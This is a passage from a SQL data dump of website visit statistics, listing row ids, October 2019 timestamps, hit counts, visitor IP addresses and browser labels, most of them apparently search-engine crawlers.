0,0,'136.243.8.158','chrome'),(456308,1571214598,1,1,0,0,'157.55.39.153','other'),(456309,1571215758,1,1,0,0,'207.46.13.148','other'),(456310,1571215869,2,2,0,0,'66.249.64.94','chrome'),(456311,1571217119,1,1,0,0,'91.196.177.46','chrome'),(456312,1571217162,1,1,0,0,'17.58.101.255','other'),(456313,1571217318,2,2,0,0,'128.78.109.155','chrome'),(456314,1571217375,1,1,0,0,'213.180.203.37','other'),(456315,1571217422,1,1,0,0,'176.126.163.233','chrome'),(456316,1571219753,2,2,0,0,'8.29.198.25','other'),(456317,1571219774,1,1,0,0,'66.249.64.18','chrome'),(456318,1571219844,1,1,0,0,'66.249.64.94','chrome'),(456319,1571220641,1,1,0,0,'176.99.11.151','chrome'),(456320,1571221072,1,1,0,0,'46.211.243.231','chrome'),(456321,1571221359,1,1,0,0,'213.180.203.44','other'),(456322,1571221873,2,2,0,0,'66.249.64.16','chrome'),(456323,1571222158,1,1,0,0,'66.249.64.69','chrome'),(456324,1571222214,1,1,0,0,'157.55.39.241','other'),(456325,1571222218,1,1,0,0,'66.249.64.66','chrome'),(456326,1571222718,2,2,0,0,'95.213.141.126','opera'),(456327,1571222805,1,1,0,0,'178.154.200.33','other'),(456328,1571223253,1,1,0,0,'13.76.229.16','chrome'),(456329,1571223408,1,1,0,0,'104.243.246.182','chrome'),(456330,1571223532,1,1,0,0,'45.43.201.40','chrome'),(456331,1571223954,1,1,0,0,'157.55.39.153','other'),(456332,1571225610,2,2,0,0,'109.73.237.37','chrome'),(456333,1571226030,6,6,0,0,'66.249.64.94','chrome'),(456334,1571226085,2,2,0,0,'66.249.64.66','chrome'),(456335,1571226320,1,1,0,0,'109.74.154.72','chrome'),(456336,1571226407,1,1,0,0,'66.249.64.69','chrome'),(456337,1571226915,1,1,0,0,'91.196.178.84','chrome'),(456338,1571227319,1,1,0,0,'91.196.177.46','firefox'),(456339,1571227579,1,1,0,0,'137.226.113.26','other'),(456340,1571227603,2,2,0,0,'66.249.64.69','chrome'),(456341,1571228308,2,2,0,0,'66.249.64.94','chrome'),(456342,1571228987,1,1,0,0,'46.211.140.100','chrome'),(456343,1571229199,1,1,0,0,'207.46.13.208','other'),(456344,1571230608,1,1,0,0,'8.29.198.26','other'),(456345,1571230683,1,1,0,0,'8.29.198.27','other'),(456346,1571231276,1,1,0,0,'207.46.13.208','other'),(456347,1571231615,1,1,0,0,'157.55.39.69','other'),(456348,1571231925,1,1,0,0,'159.253.147.44','chrome'),(456349,1571234065,1,1,0,0,'207.46.13.242','other'),(456350,1571235216,1,1,0,0,'157.55.39.241','other'),(456351,1571235456,1,1,0,0,'157.55.39.69','other'),(456352,1571236135,1,1,0,0,'46.133.238.193','chrome'),(456353,1571236708,1,1,0,0,'207.180.236.235','chrome'),(456354,1571236893,1,1,0,0,'66.249.64.66','chrome'),(456355,1571237029,1,1,0,0,'213.136.93.56','chrome'),(456356,1571237860,1,1,0,0,'66.249.64.69','chrome'),(456357,1571238284,1,1,0,0,'46.133.252.203','chrome'),(456358,1571238468,1,1,0,0,'91.196.178.83','chrome'),(456359,1571241061,1,1,0,0,'91.196.178.77','firefox'),(456360,1571241474,1,1,0,0,'66.249.64.66','chrome'),(456361,1571241481,2,2,0,0,'8.29.198.26','other'),(456362,1571241810,2,2,0,0,'77.244.145.228','chrome'),(456363,1571242215,2,2,0,0,'207.46.13.15','other'),(456364,1571244454,1,1,0,0,'207.46.13.15','other'),(456365,1571244461,2,2,0,0,'157.55.39.218','other'),(456366,1571245163,3,3,0,0,'66.249.64.94','chrome'),(456367,1571245259,1,1,0,0,'193.106.57.54','other'),(456368,1571245595,1,1,0,0,'77.222.143.222','msie'),(456369,1571246366,3,3,0,0,'66.249.64.16','chrome'),(456370,1571246368,1,1,0,0,'66.249.64.18','chrome'),(456371,1571246383,1,1,0,0,'66.249.64.69','chrome'),(456372,1571246387,4,4,0,0,'66.249.64.66','chrome'),(456373,1571246423,1,1,0,0,'207.46.13.178','other'),(456374,1571246773,1,1,0,0,'91.209.11.236','other'),(456375,1571246892,1,1,0,0,'91.196.178.129','chrome'),(456376,1571247336,1,1,0,0,'157.55.39.9','other'),(456377,1571248845,1,1,0,0,'207.46.13.96','other'),(456378,1571249080,1,1,0,0,'184.168.193.77','chrome'),(456379,1571250509,1,1,0,0,'31.14.103.240','chrome'),(456380,1571251809,1,1,0,0,'207.46.13.15','other'),(456381,1571252215,1,1,0,0,'207.46.13.96','other'),(456382,1571252346,1,1,0,0,'8.29.198.27','other'),(456383,1571252394,1,1,0,0,'8.29.198.25','other'),(456384,1571252772,1,1,0,0,'91.209.11.236','other'),(456385,1571252872,1,1,0,0,'66.249.64.69','chrome'),(456386,1571253064,1,1,0,0,'213.180.203.44','other'),(456387,1571253664,17,17,0,0,'3.228.24.192','other'),(456388,1571254637,5,5,0,0,'3.228.24.192','other'),(456389,1571254870,2,2,0,0,'157.55.39.137','other'),(456390,1571255612,13,13,0,0,'3.228.24.192','other'),(456391,1571256564,9,9,0,0,'3.228.24.192','other'),(456392,1571257511,10,10,0,0,'3.228.24.192','other'),(456393,1571258577,7,7,0,0,'3.228.24.192','other'),(456394,1571259919,2,2,0,0,'66.249.64.69','chrome'),(456395,1571259941,2,2,0,0,'66.249.64.66','chrome'),(456396,1571260246,1,1,0,0,'207.46.13.96','other'),(456397,1571260713,1,1,0,0,'66.249.64.16','chrome'),(456398,1571260754,2,2,0,0,'66.249.64.94','chrome'),(456399,1571261427,1,1,0,0,'13.66.139.0','other'),(456400,1571262479,1,1,0,0,'66.249.64.69','chrome'),(456401,1571262572,2,2,0,0,'51.255.193.227','chrome'),(456402,1571263224,2,2,0,0,'8.29.198.27','other'),(456403,1571263729,1,1,0,0,'212.90.148.128','chrome'),(456404,1571264307,1,1,0,0,'163.172.121.68','chrome'),(456405,1571265548,1,1,0,0,'66.249.64.66','chrome'),(456406,1571265970,1,1,0,0,'207.46.13.194','other'),(456407,1571266173,2,2,0,0,'192.145.239.52','chrome'),(456408,1571266690,2,2,0,0,'213.180.203.44','other'),(456409,1571266885,2,2,0,0,'66.249.64.94','chrome'),(456410,1571267045,1,1,0,0,'66.249.64.66','chrome'),(456411,1571267431,1,1,0,0,'213.180.203.37','other'),(456412,1571268126,1,1,0,0,'66.249.64.66','chrome'),(456413,1571268798,1,1,0,0,'66.249.64.69','chrome'),(456414,1571268823,3,3,0,0,'66.249.64.94','chrome'),(456415,1571269223,2,2,0,0,'213.180.203.37','chrome'),(456416,1571269992,1,1,0,0,'139.99.64.133','chrome'),(456417,1571270068,1,1,0,0,'141.8.142.2','other'),(456418,1571270079,1,1,0,0,'87.250.224.90','chrome'),(456419,1571270114,1,1,0,0,'62.205.134.182','other'),(456420,1571270695,1,1,0,0,'66.249.64.94','chrome'),(456421,1571271149,1,1,0,0,'213.180.203.44','other'),(456422,1571272253,2,2,0,0,'213.180.203.37','other'),(456423,1571272344,1,1,0,0,'66.249.64.69','chrome'),(456424,1571272491,1,1,0,0,'193.106.30.99','chrome'),(456425,1571273371,1,1,0,0,'213.180.203.44','chrome'),(456426,1571273423,1,1,0,0,'213.180.203.37','chrome'),(456427,1571274084,2,2,0,0,'8.29.198.26','other'),(456428,1571274204,1,1,0,0,'213.180.203.44','other'),(456429,1571274998,1,1,0,0,'66.249.64.69','chrome'),(456430,1571275000,1,1,0,0,'66.249.64.18','chrome'),(456431,1571275070,1,1,0,0,'213.180.203.37','chrome'),(456432,1571275235,2,2,0,0,'5.61.30.195','chrome'),(456433,1571275849,1,1,0,0,'141.8.142.2','chrome'),(456434,1571276337,1,1,0,0,'207.46.13.152','other'),(456435,1571276595,1,1,0,0,'178.154.200.33','chrome'),(456436,1571277500,1,1,0,0,'213.180.203.44','chrome'),(456437,1571277518,1,1,0,0,'192.145.239.52','chrome'),(456438,1571277542,3,3,0,0,'213.180.203.44','other'),(456439,1571278347,1,1,0,0,'157.55.39.247','other'),(456440,1571278421,1,1,0,0,'178.154.200.33','chrome'),(456441,1571279007,1,1,0,0,'141.8.142.2','other'),(456442,1571279999,1,1,0,0,'213.180.203.37','other'),(456443,1571280001,1,1,0,0,'148.72.112.48','chrome'),(456444,1571280561,2,2,0,0,'128.78.109.155','chrome'),(456445,1571280649,1,1,0,0,'213.180.203.44','other'),(456446,1571281800,1,1,0,0,'31.14.103.240','chrome'),(456447,1571282242,2,2,0,0,'91.208.99.2','chrome'),(456448,1571282560,1,1,0,0,'134.209.227.187','chrome'),(456449,1571283023,1,1,0,0,'213.180.203.37','other'),(456450,1571283028,2,2,0,0,'213.180.203.44','other'),(456451,1571283997,2,2,0,0,'213.180.203.44','other'),(456452,1571284022,4,4,0,0,'5.196.76.222','chrome'),(456453,1571284028,1,1,0,0,'213.180.203.37','chrome'),(456454,1571284725,1,1,0,0,'213.180.203.37','other'),(456455,1571284938,2,2,0,0,'8.29.198.26','other'),(456456,1571285160,1,1,0,0,'94.153.104.118','chrome'),(456457,1571285413,2,2,0,0,'66.186.19.6','chrome'),(456458,1571285482,2,2,0,0,'213.180.203.37','chrome'),(456459,1571285556,2,2,0,0,'213.180.203.44','chrome'),(456460,1571285567,1,1,0,0,'213.180.203.44','other'),(456461,1571285984,1,1,0,0,'66.249.64.66','chrome'),(456462,1571286189,1,1,0,0,'91.196.178.136','firefox'),(456463,1571287207,1,1,0,0,'213.180.203.44','other'),(456464,1571287254,2,2,0,0,'213.180.203.37','chrome'),(456465,1571287628,1,1,0,0,'213.180.203.37','other'),(456466,1571287643,1,1,0,0,'62.205.134.182','other'),(456467,1571287703,1,1,0,0,'207.46.13.4','other'),(456468,1571287732,2,2,0,0,'141.8.142.2','chrome'),(456469,1571287763,1,1,0,0,'213.180.203.44','chrome'),(456470,1571287803,1,1,0,0,'66.249.64.69','chrome'),(456471,1571288693,1,1,0,0,'213.180.203.44','chrome'),(456472,1571288707,1,1,0,0,'213.180.203.37','chrome'),(456473,1571288914,1,1,0,0,'195.176.3.24','chrome'),(456474,1571289822,1,1,0,0,'213.180.203.44','other'),(456475,1571289917,1,1,0,0,'157.55.39.230','other'),(456476,1571290030,2,2,0,0,'213.180.203.44','chrome'),(456477,1571290053,1,1,0,0,'213.180.203.37','chrome'),(456478,1571290122,1,1,0,0,'66.249.64.66','chrome'),(456479,1571290890,1,1,0,0,'141.8.142.50','other'),(456480,1571290892,1,1,0,0,'141.8.183.33','chrome'),(456481,1571291274,1,1,0,0,'37.53.89.92','chrome'),(456482,1571291668,1,1,0,0,'213.180.203.37','chrome'),(456483,1571291681,1,1,0,0,'141.8.142.2','chrome'),(456484,1571291753,1,1,0,0,'37.9.113.10','chrome'),(456485,1571291855,1,1,0,0,'91.196.178.44','chrome'),(456486,1571293147,1,1,0,0,'141.8.188.20','other'),(456487,1571293156,1,1,0,0,'141.8.142.132','chrome'),(456488,1571293322,1,1,0,0,'195.69.177.223','chrome'),(456489,1571293892,1,1,0,0,'37.9.113.142','chrome'),(456490,1571293906,1,1,0,0,'95.108.213.3','other'),(456491,1571293908,1,1,0,0,'87.250.224.104','other'),(456492,1571293911,1,1,0,0,'37.9.113.39','other'),(456493,1571294016,1,1,0,0,'141.8.132.12','chrome'),(456494,1571294157,1,1,0,0,'207.46.13.115','other'),(456495,1571294246,1,1,0,0,'195.69.177.223','chrome'),(456496,1571295284,1,1,0,0,'195.69.177.223','chrome'),(456497,1571295741,1,1,0,0,'66.249.64.69','chrome'),(456498,1571295763,1,1,0,0,'128.124.194.153','chrome'),(456499,1571295788,1,1,0,0,'8.29.198.27','other'),(456500,1571295795,1,1,0,0,'8.29.198.25','other'),(456501,1571295888,1,1,0,0,'207.46.13.6','other'),(456502,1571296113,1,1,0,0,'91.196.178.84','chrome'),(456503,1571296786,1,1,0,0,'178.171.18.235','chrome'),(456504,1571298020,1,1,0,0,'207.46.13.115','other'),(456505,1571298075,2,2,0,0,'167.71.91.159','chrome'),(456506,1571298821,1,1,0,0,'193.107.75.91','chrome'),(456507,1571298823,1,1,0,0,'37.53.64.87','chrome'),(456508,1571299433,1,1,0,0,'157.55.39.246','other'),(456509,1571299463,1,1,0,0,'37.9.113.177','other'),(456510,1571299846,1,1,0,0,'141.8.132.28','other'),(456511,1571299855,1,1,0,0,'195.69.221.54','chrome'),(456512,1571300002,1,1,0,0,'95.108.213.3','other'),(456513,1571302153,1,1,0,0,'66.249.64.69','chrome'),(456514,1571302368,1,1,0,0,'66.249.64.66','chrome'),(456515,1571303325,2,2,0,0,'66.249.64.69','chrome'),(456516,1571303664,1,1,0,0,'91.196.178.58','chrome'),(456517,1571303860,1,1,0,0,'91.196.178.169','chrome'),(456518,1571303910,1,1,0,0,'67.137.36.66','chrome'),(456519,1571304032,1,1,0,0,'66.249.64.94','chrome'),(456520,1571304156,1,1,0,0,'91.196.178.84','chrome'),(456521,1571304214,1,1,0,0,'91.196.178.6','chrome'),(456522,1571304381,5,5,0,0,'95.217.76.85','chrome'),(456523,1571304810,1,0,1,0,'157.55.39.135',''),(456524,1571305271,1,1,0,0,'66.249.64.69','chrome'),(456525,1571305535,1,1,0,0,'91.196.178.6','chrome'),(456526,1571305702,1,0,1,0,'157.55.39.246',''),(456527,1571306477,1,1,0,0,'66.249.64.69','chrome'),(456528,1571306644,1,1,0,0,'8.29.198.27','other'),(456529,1571306667,1,1,0,0,'8.29.198.25','other'),(456530,1571307138,2,2,0,0,'89.111.179.80','chrome'),(456531,1571307836,2,1,1,0,'157.55.39.246',''),(456532,1571309326,2,2,0,0,'66.249.64.66','chrome'),(456533,1571309369,2,2,0,0,'66.249.64.94','chrome'),(456534,1571310181,2,2,0,0,'66.249.64.69','chrome'),(456535,1571310605,3,3,0,0,'66.249.64.94','chrome'),(456536,1571310710,2,2,0,0,'51.68.11.207','chrome'),(456537,1571310756,1,1,0,0,'157.55.39.214','other'),(456538,1571312230,1,1,0,0,'69.16.245.168','chrome'),(456539,1571313133,1,1,0,0,'66.249.64.18','chrome'),(456540,1571313152,2,2,0,0,'66.249.64.69','chrome'),(456541,1571313173,2,2,0,0,'66.249.64.16','chrome'),(456542,1571313185,3,3,0,0,'66.249.64.94','chrome'),(456543,1571313187,2,2,0,0,'66.249.64.66','chrome'),(456544,1571313253,1,1,0,0,'109.74.154.72','chrome'),(456545,1571314766,3,3,0,0,'66.249.64.18','chrome'),(456546,1571314893,5,5,0,0,'66.249.64.69','chrome'),(456547,1571314964,25,25,0,0,'66.249.64.94','chrome'),(456548,1571315016,6,6,0,0,'66.249.64.66','chrome'),(456549,1571315027,5,5,0,0,'66.249.64.16','chrome'),(456550,1571316076,1,1,0,0,'66.249.64.66','chrome'),(456551,1571316676,2,2,0,0,'31.14.103.240','chrome'),(456552,1571316807,4,0,4,0,'157.55.39.214',''),(456553,1571317003,1,1,0,0,'66.249.64.66','chrome'),(456554,1571317074,1,1,0,0,'95.132.52.178','chrome'),(456555,1571317491,1,1,0,0,'8.29.198.27','other'),(456556,1571317535,1,1,0,0,'8.29.198.26','other'),(456557,1571318051,1,1,0,0,'66.249.64.66','chrome'),(456558,1571318095,2,0,2,0,'207.46.13.194',''),(456559,1571318123,1,1,0,0,'91.196.178.84','chrome'),(456560,1571318282,3,3,0,0,'66.249.64.94','chrome'),(456561,1571318446,1,1,0,0,'66.249.64.18','chrome'),(456562,1571318553,2,2,0,0,'50.116.92.161','chrome'),(456564,1571318831,1,1,0,0,'161.69.99.11','other'),(456565,1571319257,2,0,2,0,'157.55.39.47',''),(456566,1571319470,1,1,0,0,'66.249.64.69','chrome'),(456567,1571319735,2,2,0,0,'150.95.110.111','chrome'),(456568,1571319839,1,1,0,0,'172.104.43.233','chrome'),(456569,1571319866,1,1,0,0,'94.231.107.9','chrome'),(456570,1571320097,1,1,0,0,'66.249.64.94','chrome'),(456571,1571320236,1,1,0,0,'46.200.252.4','chrome'),(456572,1571320364,1,1,0,0,'66.249.64.16','chrome'),(456573,1571320366,1,1,0,0,'66.249.64.66','chrome'),(456574,1571320785,1,1,0,0,'66.249.64.18','chrome'),(456575,1571321301,1,1,0,0,'66.249.64.16','chrome'),(456576,1571321887,1,1,0,0,'66.249.64.94','chrome'),(456577,1571321930,2,0,2,0,'157.55.39.47',''),(456578,1571322225,2,2,0,0,'209.124.75.158','chrome'),(456579,1571322343,1,1,0,0,'46.96.30.192','chrome'),(456580,1571323746,1,1,0,0,'5.61.30.195','chrome'),(456581,1571325425,1,1,0,0,'157.55.39.98','other'),(456582,1571325904,1,1,0,0,'91.196.178.168','chrome'),(456583,1571326513,1,1,0,0,'37.9.113.200','chrome'),(456584,1571326516,1,1,0,0,'5.45.207.49','chrome'),(456585,1571326520,1,1,0,0,'178.154.200.60','chrome'),(456586,1571326553,2,0,2,0,'157.55.39.98',''),(456587,1571326647,1,1,0,0,'141.8.188.18','chrome'),(456588,1571327337,1,1,0,0,'178.154.200.13','other'),(456589,1571327509,3,1,2,0,'157.55.39.98',''),(456590,1571327514,1,1,0,0,'37.9.113.200','other'),(456591,1571327870,1,1,0,0,'95.108.213.61','chrome'),(456592,1571327883,1,1,0,0,'37.9.113.200','chrome'),(456593,1571327935,1,1,0,0,'37.9.113.6','chrome'),(456594,1571327937,1,1,0,0,'141.8.132.9','other'),(456595,1571328105,1,1,0,0,'141.8.142.119','chrome'),(456596,1571328390,1,1,0,0,'8.29.198.26','other'),(456597,1571328548,1,1,0,0,'8.29.198.25','other'),(456598,1571328555,1,1,0,0,'37.9.113.39','other'),(456599,1571328940,1,1,0,0,'87.250.224.104','other'),(456600,1571329258,1,1,0,0,'141.8.142.50','other'),(456601,1571329543,1,1,0,0,'46.211.137.251','chrome'),(456602,1571329572,1,1,0,0,'5.45.207.65','other'),(456603,1571330073,3,1,2,0,'157.55.39.47',''),(456604,1571330567,1,1,0,0,'193.106.30.99','chrome'),(456605,1571330745,1,1,0,0,'37.9.113.33','chrome'),(456606,1571330748,1,1,0,0,'141.8.132.19','chrome'),(456607,1571330757,1,1,0,0,'87.250.224.90','chrome'),(456608,1571330760,1,1,0,0,'37.9.113.10','chrome'),(456609,1571330763,1,1,0,0,'95.108.181.104','chrome'),(456610,1571330765,1,1,0,0,'95.108.213.55','chrome'),(456611,1571330768,1,1,0,0,'141.8.183.15','chrome'),(456612,1571330771,1,1,0,0,'141.8.142.164','chrome'),(456613,1571330773,1,1,0,0,'178.154.200.33','chrome'),(456614,1571330776,1,1,0,0,'141.8.183.33','chrome'),(456615,1571330778,1,1,0,0,'37.9.113.177','chrome'),(456616,1571330781,1,1,0,0,'5.45.207.49','chrome'),(456617,1571332745,1,0,1,0,'66.249.64.69',''),(456618,1571333177,1,1,0,0,'141.8.142.2','other'),(456619,1571334296,2,0,2,0,'207.46.13.154',''),(456620,1571334824,1,1,0,0,'207.46.13.154','other'),(456621,1571336257,1,1,0,0,'141.8.142.2','chrome'),(456622,1571336293,2,2,0,0,'178.154.200.33','chrome'),(456623,1571336334,1,1,0,0,'37.9.113.10','chrome'),(456624,1571336337,9,9,0,0,'213.180.203.37','chrome'),(456625,1571336340,6,6,0,0,'213.180.203.44','chrome'),(456626,1571336371,1,1,0,0,'66.249.64.66','chrome'),(456627,1571336461,2,2,0,0,'207.46.13.140','other'),(456628,1571336950,1,1,0,0,'176.37.116.119','chrome'),(456629,1571337306,1,1,0,0,'66.249.64.94','chrome'),(456630,1571337845,1,1,0,0,'207.46.13.138','other'),(456631,1571337949,2,2,0,0,'213.180.203.44','chrome'),(456632,1571338576,2,0,2,0,'207.46.13.154',''),(456633,1571338598,2,2,0,0,'213.180.203.44','other'),(456634,1571339068,1,1,0,0,'207.46.13.154','other'),(456635,1571339289,1,1,0,0,'8.29.198.26','other'),(456636,1571339316,2,2,0,0,'213.180.203.37','chrome'),(456637,1571339337,2,2,0,0,'213.180.203.44','chrome'),(456638,1571339422,1,1,0,0,'66.249.64.69','chrome'),(456639,1571339461,1,1,0,0,'8.29.198.27','other'),(456640,1571340606,1,1,0,0,'213.180.203.44','chrome'),(456641,1571340654,1,1,0,0,'213.180.203.37','other'),(456642,1571341021,1,1,0,0,'207.46.13.140','other'),(456643,1571341270,7,7,0,0,'178.62.82.141','chrome'),(456644,1571341402,2,2,0,0,'213.180.203.44','other'),(456645,1571342235,1,1,0,0,'213.180.203.37','chrome'),(456646,1571342448,1,1,0,0,'213.180.203.44','other'),(456647,1571343764,5,3,2,0,'207.46.13.140',''),(456648,1571344221,1,1,0,0,'207.46.13.139','other'),(456649,1571344540,1,1,0,0,'213.180.203.37','chrome'),(456650,1571344575,1,1,0,0,'141.8.142.2','chrome'),(456651,1571344825,2,0,2,0,'207.46.13.140',''),(456652,1571346556,1,1,0,0,'141.8.183.15','chrome'),(456653,1571346599,1,1,0,0,'141.8.142.50','chrome'),(456654,1571346600,1,1,0,0,'209.17.96.194','other'),(456655,1571346616,1,1,0,0,'5.45.207.49','other'),(456656,1571346632,1,1,0,0,'141.8.132.19','chrome'),(456657,1571348030,1,1,0,0,'207.46.13.140','other'),(456658,1571349666,1,1,0,0,'141.8.142.161','chrome'),(456659,1571349670,1,1,0,0,'37.9.113.163','chrome'),(456660,1571349674,1,1,0,0,'95.108.213.55','chrome'),(456661,1571350177,1,1,0,0,'8.29.198.25','other'),(456662,1571350326,1,1,0,0,'8.29.198.26','other'),(456663,1571350492,1,1,0,0,'87.250.224.90','chrome'),(456664,1571350622,1,1,0,0,'185.103.110.209','chrome'),(456665,1571350778,1,1,0,0,'141.8.142.2','other'),(456666,1571350960,1,1,0,0,'141.8.183.33','other'),(456667,1571351196,2,0,2,0,'207.46.13.213',''),(456668,1571351790,2,2,0,0,'213.180.203.44','other'),(456669,1571351845,1,1,0,0,'213.180.203.44','chrome'),(456670,1571352494,1,1,0,0,'141.8.142.2','chrome'),(456671,1571352746,1,1,0,0,'207.46.13.208','other'),(456672,1571352807,1,1,0,0,'95.108.181.104','other'),(456673,1571353116,1,1,0,0,'66.249.64.66','chrome'),(456674,1571354244,2,0,2,0,'207.46.13.208',''),(456675,1571355025,2,2,0,0,'213.180.203.44','other'),(456676,1571355138,1,1,0,0,'141.8.142.2','other'),(456677,1571355365,1,1,0,0,'213.180.203.37','other'),(456678,1571356351,2,0,2,0,'207.46.13.138',''),(456679,1571356782,1,1,0,0,'66.249.64.69','chrome'),(456680,1571357264,1,1,0,0,'213.180.203.44','other'),(456681,1571357801,2,0,2,0,'207.46.13.138',''),(456682,1571357859,1,1,0,0,'66.102.9.191','chrome'),(456683,1571357877,1,1,0,0,'207.46.13.208','other'),(456684,1571358414,1,1,0,0,'66.249.64.94','chrome'),(456685,1571359779,2,0,2,0,'207.46.13.208',''),(456686,1571360142,2,2,0,0,'66.249.64.66','chrome'),(456687,1571360362,1,1,0,0,'66.249.64.94','chrome'),(456688,1571360431,2,0,2,0,'207.46.13.138',''),(456689,1571360968,1,1,0,0,'207.46.13.10','other'),(456690,1571361036,1,1,0,0,'8.29.198.26','other'),(456691,1571361205,1,1,0,0,'8.29.198.27','other'),(456692,1571361794,1,1,0,0,'66.249.64.69','chrome'),(456693,1571363020,2,2,0,0,'66.249.64.94','chrome'),(456694,1571363460,1,1,0,0,'207.46.13.30','other'),(456695,1571363643,1,1,0,0,'66.249.64.66','chrome'),(456696,1571364381,2,2,0,0,'157.55.39.233','other'),(456697,1571364560,1,1,0,0,'207.46.13.208','other'),(456698,1571364787,1,1,0,0,'66.249.64.94','chrome'),(456699,1571366071,1,1,0,0,'207.46.13.208','other'),(456700,1571368428,1,1,0,0,'66.249.64.66','chrome'),(456701,1571368562,1,1,0,0,'157.55.39.233','other'),(456702,1571369805,2,0,2,0,'207.46.13.211',''),(456703,1571370940,1,1,0,0,'66.249.64.94','chrome'),(456704,1571371909,1,1,0,0,'8.29.198.26','other'),(456705,1571372067,1,1,0,0,'8.29.198.25','other'),(456706,1571373222,1,1,0,0,'66.249.64.94','chrome'),(456707,1571373285,1,1,0,0,'66.249.64.69','chrome'),(456708,1571375099,1,1,0,0,'193.106.30.99','chrome'),(456709,1571377243,3,3,0,0,'91.196.178.183','chrome'),(456710,1571377736,1,1,0,0,'176.126.163.130','chrome'),(456711,1571378951,1,1,0,0,'66.249.64.66','chrome'),(456712,1571379219,1,1,0,0,'213.108.44.26','chrome'),(456713,1571380236,1,1,0,0,'178.62.196.82','other'),(456714,1571380577,1,1,0,0,'66.249.64.69','chrome'),(456715,1571380682,2,2,0,0,'66.249.64.94','chrome'),(456716,1571381147,1,1,0,0,'213.180.203.44','other'),(456717,1571381666,1,1,0,0,'91.196.178.176','chrome'),(456718,1571382382,1,1,0,0,'66.249.64.66','chrome'),(456719,1571382777,1,1,0,0,'8.29.198.25','other'),(456720,1571382856,1,1,0,0,'207.46.13.211','other'),(456721,1571382978,1,1,0,0,'8.29.198.27','other'),(456722,1571383852,1,1,0,0,'66.249.64.94','chrome'),(456723,1571384279,2,2,0,0,'91.209.11.236','other'),(456724,1571385693,1,1,0,0,'91.196.177.46','chrome'),(456725,1571386059,1,1,0,0,'37.53.89.92','chrome'),(456726,1571386955,1,1,0,0,'91.196.177.46','firefox'),(456727,1571388491,2,2,0,0,'91.196.178.84','chrome'),(456728,1571389048,1,1,0,0,'37.53.89.92','chrome'),(456729,1571389432,1,1,0,0,'91.196.178.84','chrome'),(456730,1571390911,1,1,0,0,'91.200.115.35','firefox'),(456731,1571391878,2,2,0,0,'91.196.178.84','chrome'),(456732,1571392056,1,1,0,0,'66.249.64.94','chrome'),(456733,1571392102,1,1,0,0,'91.196.178.174','chrome'),(456734,1571392237,1,1,0,0,'207.46.13.92','other'),(456735,1571392936,2,2,0,0,'91.196.178.3','chrome'),(456736,1571392986,1,0,1,0,'207.46.13.211',''),(456737,1571393385,1,1,0,0,'207.46.13.211','other'),(456738,1571393655,1,1,0,0,'8.29.198.27','other'),(456739,1571393835,1,1,0,0,'8.29.198.26','other'),(456740,1571394929,1,1,0,0,'207.46.13.92','other'),(456741,1571395313,1,1,0,0,'66.249.64.69','chrome'),(456742,1571397426,1,1,0,0,'207.46.13.92','other'),(456743,1571397914,1,1,0,0,'109.74.154.72','chrome'),(456744,1571398054,1,1,0,0,'178.175.133.105','msie'),(456745,1571400527,1,1,0,0,'46.211.243.147','chrome'),(456746,1571400676,1,1,0,0,'91.196.178.130','chrome'),(456747,1571400865,1,1,0,0,'109.251.209.3','chrome'),(456748,1571401087,1,1,0,0,'91.196.178.183','chrome'),(456749,1571402166,1,1,0,0,'46.200.252.4','chrome'),(456750,1571402373,1,1,0,0,'188.234.2.8','chrome'),(456751,1571403098,2,2,0,0,'109.251.209.3','chrome'),(456752,1571403099,1,1,0,0,'46.211.133.5','chrome'),(456753,1571404321,1,1,0,0,'46.211.133.5','chrome'),(456754,1571404553,2,2,0,0,'8.29.198.25','other'),(456755,1571404575,2,0,2,0,'207.46.13.92',''),(456756,1571404697,1,1,0,0,'94.153.108.93','chrome'),(456757,1571405580,1,1,0,0,'66.249.64.69','chrome'),(456758,1571406189,1,0,1,0,'207.46.13.92',''),(456759,1571406995,1,1,0,0,'46.211.243.132','chrome'),(456760,1571408206,2,2,0,0,'207.46.13.101','other'),(456761,1571409295,1,1,0,0,'66.249.64.94','chrome'),(456762,1571409984,1,1,0,0,'207.46.13.220','other'),(456763,1571410283,1,1,0,0,'46.42.162.150','msie'),(456764,1571410317,1,0,1,0,'207.46.13.193',''),(456765,1571411513,1,1,0,0,'207.46.13.92','other'),(456766,1571412005,1,1,0,0,'66.249.64.69','chrome'),(456767,1571412124,1,1,0,0,'207.46.13.101','other'),(456768,1571412286,1,1,0,0,'207.46.13.220','other'),(456769,1571413843,1,0,1,0,'207.46.13.220',''),(456770,1571414383,1,1,0,0,'66.249.64.66','chrome'),(456771,1571414710,1,1,0,0,'46.211.134.238','chrome'),(456772,1571414759,1,1,0,0,'66.249.64.94','chrome'),(456773,1571415092,1,0,1,0,'207.46.13.220',''),(456774,1571415440,2,2,0,0,'8.29.198.27','other'),(456775,1571415498,1,1,0,0,'66.249.64.18','chrome'),(456776,1571415823,1,0,1,0,'207.46.13.101',''),(456777,1571416409,1,1,0,0,'66.249.64.69','chrome'),(456778,1571416588,1,1,0,0,'207.46.13.193','other'),(456779,1571417784,2,2,0,0,'207.46.13.207','other'),(456780,1571418603,1,1,0,0,'91.196.178.80','firefox'),(456781,1571418861,1,1,0,0,'207.46.13.193','other'),(456782,1571419030,1,1,0,0,'130.180.210.14','firefox'),(456783,1571419118,1,1,0,0,'213.180.203.44','other'),(456784,1571419349,1,1,0,0,'141.8.142.2','other'),(456785,1571419388,1,1,0,0,'46.133.81.141','chrome'),(456786,1571420232,1,1,0,0,'178.154.200.33','other'),(456787,1571420601,1,1,0,0,'37.73.226.107','chrome'),(456788,1571421293,1,1,0,0,'141.8.142.161','chrome'),(456789,1571421448,1,1,0,0,'213.180.203.37','other'),(456790,1571421847,1,1,0,0,'178.54.241.69','chrome'),(456791,1571422395,2,2,0,0,'141.8.142.2','chrome'),(456792,1571422782,1,0,1,0,'207.46.13.16',''),(456793,1571423105,1,1,0,0,'91.196.178.61','chrome'),(456794,1571423253,1,1,0,0,'193.106.30.99','chrome'),(456795,1571423346,1,1,0,0,'213.180.203.44','chrome'),(456796,1571423350,1,1,0,0,'213.180.203.37','chrome'),(456797,1571423453,1,1,0,0,'31.13.127.14','other'),(456798,1571423455,1,1,0,0,'31.13.127.25','other'),(456799,1571424055,1,1,0,0,'66.249.64.66','chrome'),(456800,1571424253,1,1,0,0,'87.250.224.90','chrome'),(456801,1571426355,1,1,0,0,'8.29.198.26','other'),(456802,1571426385,1,1,0,0,'207.46.13.193','other'),(456803,1571426395,1,1,0,0,'213.180.203.37','chrome'),(456804,1571426549,1,1,0,0,'8.29.198.27','other'),(456805,1571427837,1,0,1,0,'157.55.39.197',''),(456806,1571428606,1